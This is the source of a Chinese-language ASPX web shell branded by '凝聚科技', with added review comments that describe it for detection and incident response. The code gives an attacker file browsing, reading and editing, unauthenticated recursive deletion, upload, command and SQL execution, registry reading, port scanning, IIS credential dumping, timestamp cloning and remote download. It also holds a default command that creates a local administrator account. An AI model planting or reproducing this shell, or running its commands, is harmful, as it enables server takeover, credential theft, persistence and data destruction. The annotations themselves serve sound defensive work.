<%-- NOTE(review): The banner text near the end of this file identifies the page as an ASPX web shell. The annotations added here describe what the visible code does, for detection and incident response; no code is changed.
     validateRequest="false" switches off ASP.NET request validation for this page and aspcompat="true" runs it on an STA thread so COM components can be called.
     Those two attributes, combined with imports for System.Diagnostics, Microsoft.Win32, System.Net.Sockets, System.Data.SqlClient and System.DirectoryServices in one content page, are an unusual combination and a reasonable thing to match on when hunting for planted .aspx files. --%>
<%@ Page Language="C#" ContentType="text/html" validateRequest="false" aspcompat="true"%>
<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<%@ Import Namespace="Microsoft.Win32" %>
<%@ Import Namespace="System.Collections" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Threading" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.DirectoryServices"%>
<%@ Import Namespace="System.Diagnostics" %>
<% //-------------------------------Code by sunue-------------------------------- //-------------------------------------------- %>
<%
    // page, action and src are taken directly from the query string; nothing visible in this file validates or normalises them before use.
    string page = Request.QueryString["page"]; string action = Request.QueryString["action"]; string src = Request.QueryString["src"];
%>
<%
    // NOTE(review): Both branches below execute before the Session["root"] test that gates the rest of the page,
    // so the deletions they perform are not bound to a logged-in session.
    // "del" calls Directory.Delete(src, true), a recursive directory removal; "deldir" deletes a single file through FileInfo.Delete.
    // For response work: file or directory loss under the worker-process identity on a host carrying this page
    // cannot be attributed to an authenticated operator alone.
    // GetWebName and GetParentDir are defined outside this excerpt.
    if (action == "del") { Directory.Delete(src,true); string webname = GetWebName(); Response.Redirect(webname + "?page=index&src="+GetParentDir(src));////
    } if (action == "deldir") { FileInfo fl = new FileInfo(src); fl.Delete(); string webname = GetWebName(); Response.Redirect(GetParentDir(webname + "?page=index&src=" + src)); }
%>
<% /* Everything from here to the matching else-branch near the end of the file is rendered only when Session["root"] is set; where that flag is assigned is not visible in this excerpt. */ if (Session["root"] != null) { %>
功能: <% Response.Write("Webshell目录"); %> 基本信息 进程管理 新建文件 新建目录 文件上传 注册表读取 cmd执行 sql执行 端口扫描 iis信息 克隆时间 远程文件下载 登出

提权目录: Program Files Documents PcAnywhere 开始菜单 All Users Serv-u目录I Serv-u目录II Real Sql Server Config Data Temp

盘符浏览: <% /* Lists every logical drive returned by Environment.GetLogicalDrives() and writes the names into the response. */ String[] drives = Environment.GetLogicalDrives(); for (int i = 0; i < drives.Length; i++) { Response.Write(""+ drives[i]+"" + "    "); } %>
当前路径: <% /* Writes the page's physical directory when src is absent, otherwise echoes the query-string value src into the response without HTML encoding (request validation is disabled in the Page directive). */ if (src == null) { Response.Write(Server.MapPath(".")+"\\"); } else Response.Write(src); %>

<% /* Host-information panel: copies the machine name, client language/address/agent/host name, the page's physical and virtual path, current time, CLR version, Environment.UserName and OS version into label controls. The labels (LbServerNameC and the others) are declared in markup that is not part of this excerpt. NOTE(review): Environment.UserName here should be the account the request runs under - confirm against the application pool identity when scoping what this page could reach. */ if ((page == "info") && (Session["root"] != null)) { this.LbServerNameC.Text = Server.MachineName; this.LbLangC.Text = Request.UserLanguages[0]; this.LbIpC.Text = Request.UserHostAddress; this.LbBrowerC.Text = Request.UserAgent; this.LbDnsC.Text = Request.UserHostName; this.LbUrlC.Text = Server.MapPath("."); this.LbUrlXdC.Text = Request.Path; this.LbTimeC.Text = DateTime.Now.ToString(); this.Lbversionc.Text = Environment.Version.ToString(); this.LbUserc.Text = Environment.UserName; this.LbBBC.Text = Environment.OSVersion.ToString(); %>











<%-- NOTE(review): The branches below only select which form is rendered; the handlers that act on the forms are not in this excerpt.
     The literal text that follows each branch appears to be the form's pre-filled default value (the input markup has been stripped), which makes these strings usable as content signatures for this file.
     The default shown for the "sql" form is an account-creation command that adds a user to the local Administrators group; on a host where this page is found, review local accounts and Administrators membership as part of triage. --%>
<% } else if ((page == "reg") && (Session["root"] != null)) { /* registry-read form; the default key below holds the Terminal Services listener port */ %>
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Wds\rdpwd\Tds\tcpPortNumber
<% } else if ((page == "upload") && (Session["root"] != null)) { /* file-upload form */ %> 保存路径:

<% } else if ((page == "cmd") && (Session["root"] != null)) { /* command-execution form */ %> net user
<% } else if ((page == "sql") && (Session["root"] != null)) { /* SQL form; the next lines look like fused defaults for server, login, password and statement - TODO confirm against the original markup */ %> .
sasa
net user char char /add & net localgroup administrators char /add
<% } else if (page == "iis" && Session["root"] != null) { /* IIS information view; the fused header below reads ID / IIS_USER / IIS_PASS / Domain / Path */ %>
IDIIS_USERIIS_PASSDomainPath
<% /* AdCx is defined outside this excerpt. NOTE(review): given the column names above and the System.DirectoryServices import, it presumably reads per-site account settings from IIS configuration - if so, treat those credentials as exposed and rotate them; confirm against the full file. */ AdCx(); } else if ((page == "scan") && (Session["root"] != null)) { /* port-scan form; defaults are a loopback address and a comma-separated port list */ %> IP:127.0.0.1 port(多端口请用逗号隔开)21,1433,3389
<% } %> <% /* logout clears the session flag and redirects to the page itself */ else if (page == "logout") { Session["root"] = null; Response.Redirect(GetWebName()); %> <% } else if ((page == "clonetime") && (Session["root"] != null)) { /* timestamp-cloning form (source file / target file). NOTE(review): the handler is not visible here, but its presence means file timestamps on an affected host should not be relied on alone when building a timeline. */ %> 要克隆的文件:
被克隆的文件:
<% } else if ((page == "download") && (Session["root"] != null)) { /* remote-download form: a URL to fetch and a local path to save to; outbound web requests from the worker process are worth checking in proxy or firewall logs */ %>
下载地址:http://www.baidu.com/img/logo.gif
保存路径:c:\logo.gif
<% } else if ((page == "newdir") && (Session["root"] != null)) { /* create-directory form */ %> 输入路径和文件夹名称:
<% } else if ((page == "index") && Session["root"] != null) { /* directory browser for the caller-supplied src path */ %> <% /* An empty src prints a "cannot go further up" message; any other value is handed to GetDir, which is defined outside this excerpt. */ if (src == "") { Response.Write("我已经无法再跳上层目录了,请往回走,谢谢!"); } else GetDir(src, src); %> <% } else if ((page == "process") && Session["root"] != null) { /* process view: clears the ListBoxPro control and calls listprocess, defined outside this excerpt; the labels that follow describe a form for launching a program with arguments */ ListBoxPro.Items.Clear(); listprocess(); %>
可带参数执行指定程序功能(权限限制):
执行程序(绝对路径):
参数(若无,可不写):
当前进程:

总进程数:
<% } else if ((page == "newfile") && (Session["root"] != null)) { /* create-file form; the path below appears to be its default value */ %> c:\char.txt


<% } else if ((action == "edit") && (Session["root"] != null)) { %> <% /* Loads the whole file named by the query-string value src into a text box using the system default encoding. Any file readable by the worker-process identity (configuration files, connection strings, keys) should be treated as disclosed when scoping an incident involving this page. The reader is closed with an explicit Close() call and no try/finally, so an exception in ReadToEnd leaves it open until finalization. */ TextBoxReadDir.Text = src; StreamReader sr = new StreamReader(TextBoxReadDir.Text.ToString(), Encoding.Default); TextBoxFileContent.Text = sr.ReadToEnd(); sr.Close(); %>



<% } else if (action == "rename" && Session["root"] != null) { /* rename form: both text boxes are pre-filled with src; the handler that performs the rename is not in this excerpt */ TextBoxRename.Text = src; TextBoxRenameTo.Text = src; %>
重命名:
为:
<% } /* this "if" starts a new chain rather than continuing the else-if chain above */ if (action == "copy" && (Session["root"] != null)) { /* copy form: source box pre-filled with src */ TextBoxCopy.Text = src; %>
从:
到:
<% } else if (action == "down" && (Session["root"] != null)) { /* passes src to DownFile, defined outside this excerpt; presumably it returns the file to the client - confirm against the full file and check web logs for action=down requests when estimating data exposure */ DownFile(src); %> <% } /* closes the Session["root"] gate opened at the top of the page; the else-branch renders the login form */ } else { %>
/*只支持鼠标登录,不可用回车*/

/*警告:此网页木马采用Visual C# 2005 编写,仅供学习研究之用,不得用于非法*/

<% } %>
凝聚科技专用AspX大马 By:凝聚科技